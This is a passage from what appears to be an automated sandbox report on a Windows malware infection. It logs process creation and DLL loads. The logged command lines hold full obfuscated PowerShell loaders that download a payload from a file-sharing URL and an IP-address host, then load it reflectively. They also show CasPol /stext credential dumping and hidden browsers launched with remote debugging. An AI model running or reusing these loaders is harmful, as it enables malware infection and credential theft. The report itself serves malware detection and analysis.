0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXEJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESAD4B.tmp" "c:\Users\user\AppData\Local\Temp\hzf3qrfx\CSC9B4882FB46014212BEF1C08D2F6A4AAF.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\cakcgbw"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\nupmhthbjzo"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\pwufhlsvxhhyjy"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1972,i,17397243976134850236,17257031585275351317,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:3
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6784 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6888 --field-trial-handle=2108,i,108276422710067068,6062230291710951248,262144 /prefetch:8
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
